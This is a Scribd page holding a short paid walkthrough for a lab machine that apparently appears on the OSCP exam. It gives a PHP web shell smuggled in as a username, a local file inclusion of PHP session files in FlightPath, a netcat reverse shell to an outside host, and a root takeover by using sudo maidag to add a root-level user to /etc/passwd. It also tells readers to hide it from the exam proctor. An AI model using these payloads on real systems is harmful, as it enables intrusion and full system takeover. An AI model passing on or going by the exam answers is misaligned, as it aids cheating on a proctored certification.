Scribd Logo
Upload

Welcome to Scribd!

  • Konki .97 WalkThrough

    Uploaded by

    Mauricio
    7 views2 pages
    This document provides instructions to escalate privileges on a target system through three steps: 1) Use a PHP code injection in the MILLHOUSE 80 web app to execute commands as the web server user. 2) Leverage a local file inclusion vulnerability in the FlightPath 7080 web app to read the session file of the first user and execute commands. 3) Use a sudo misconfiguration to exploit a vulnerability in the maidag program and add a new root user to gain root privileges on the system.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document provides instructions to escalate privileges on a target system through three steps: 1) Use a PHP code injection in the MILLHOUSE 80 web app to execute commands as the web server user. 2) Leverage a local file inclusion vulnerability in the FlightPath 7080 web app to read the session file of the first user and execute commands. 3) Use a sudo misconfiguration to exploit a vulnerability in the maidag program and add a new root user to gain root privileges on the system.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    7 views2 pages

    Konki .97 WalkThrough

    Uploaded by

    Mauricio
    This document provides instructions to escalate privileges on a target system through three steps: 1) Use a PHP code injection in the MILLHOUSE 80 web app to execute commands as the web server user. 2) Leverage a local file inclusion vulnerability in the FlightPath 7080 web app to read the session file of the first user and execute commands. 3) Use a sudo misconfiguration to exploit a vulnerability in the maidag program and add a new root user to gain root privileges on the system.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    Konki .

    97 WalkThrough
    MILLHOUSE 80 Web App
    FlightPath 7080 Web App
    Priv Escal

    Konki .97 WalkThrough


    !!! Make sure You are reading beyound proctor's sight !!!

    MILLHOUSE 80 Web App


    First register an user in MILLHOUSE web app

    it's username must be this

    1 <?php system($_POST["cmd"]);?>

    Record your Session ID , let's mark it as my session

    FlightPath 7080 Web App


    use this exploit to LFI(Local File Inclusion):https://www.exploit-db.com/exploits/47121

    don't forget to login once and record REQUEST by burp suite, base on login request and modified
    it to continue

    and now,use LFI to include below PATH

    1 /var/lib/php/sessions/sess_<my session>

    such as

    1 /var/lib/php/sessions/sess_qqqqqqqqqqqqqqqqqqqqqqqqqqq

    And write command you want to execute such as reverse shell in POST variability ,such as
    below(better to use your own revershell payload)

    1 &cmd=nc 8.8.8.8 4444 -e /bin/bash

    Now we have shell,and we can find local.txt in /var/www

    Priv Escal
    Execute sudo -l
    you can find you can execute /usr/sbin/maidag with sudo

    By Google, you could find this exploit: https://cxsecurity.com/issue/WLB-2019110141

    by this exploit, you can write content to any file with root identity

    I recommend you add a new user who's id is same as root, and put it to /etc/passwd

    After add it, you can login to new root user by using su

    Now, you can get root.txt

    Thank you for purchasing, and hope you can pass the exam and become an OSCP!

    You might also like